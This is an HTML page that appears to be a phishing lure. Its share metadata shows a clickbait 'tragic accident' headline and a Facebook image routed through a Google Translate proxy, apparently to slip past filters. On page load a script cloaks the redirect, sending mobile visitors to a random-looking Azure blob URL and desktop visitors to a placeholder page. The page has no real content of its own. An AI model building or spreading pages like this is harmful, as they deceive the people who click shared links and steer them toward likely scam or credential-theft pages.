<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Tragic accident claims several lives this morning..."/>
<meta property="og:image" content="https://scontent-xx-fbcdn-net.translate.goog/v/t1.15752-9/441619953_1013836780262169_8107316885556195323_n.png?stp=dst-png_p206x206&amp_nc_cat=105&ampccb=1-7&amp_nc_sid=5f2048&amp_nc_ohc=85T0-lgZtSIQ7kNvgE7YQet&amp_nc_ad=z-m&amp_nc_cid=0&amp_nc_ht=scontent.xx&ampoh=03_Q7cD1QG8AgVC4yVNq9ZQ3poIaqoQ8FGl4vTzUxd8-QtncnOd4g&ampoe=666E474A&amp_x_tr_sl=es&amp_x_tr_tl=en&amp_x_tr_hl=es-419&amp_x_tr_pto=wapp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
	function generateRandomString(iLen) {
    var sRnd = '';
    var sChrs = "abcdefghiklmnopqrstuvwxyz";
    for (var i = 0; i < iLen; i++) {
      var randomPoz = Math.floor(Math.random() * sChrs.length);
      sRnd += sChrs.substring(randomPoz, randomPoz + 1);
    }
    return sRnd;
  }
        if (screen.width <= 720) {
        window.location = "https://djydtyjdtyj.blob.core.windows.net/mk7566756/rthrthrthrth.html";
    } else {
        window.location = "https://example.com/default_page.html"
    }
</script>
	
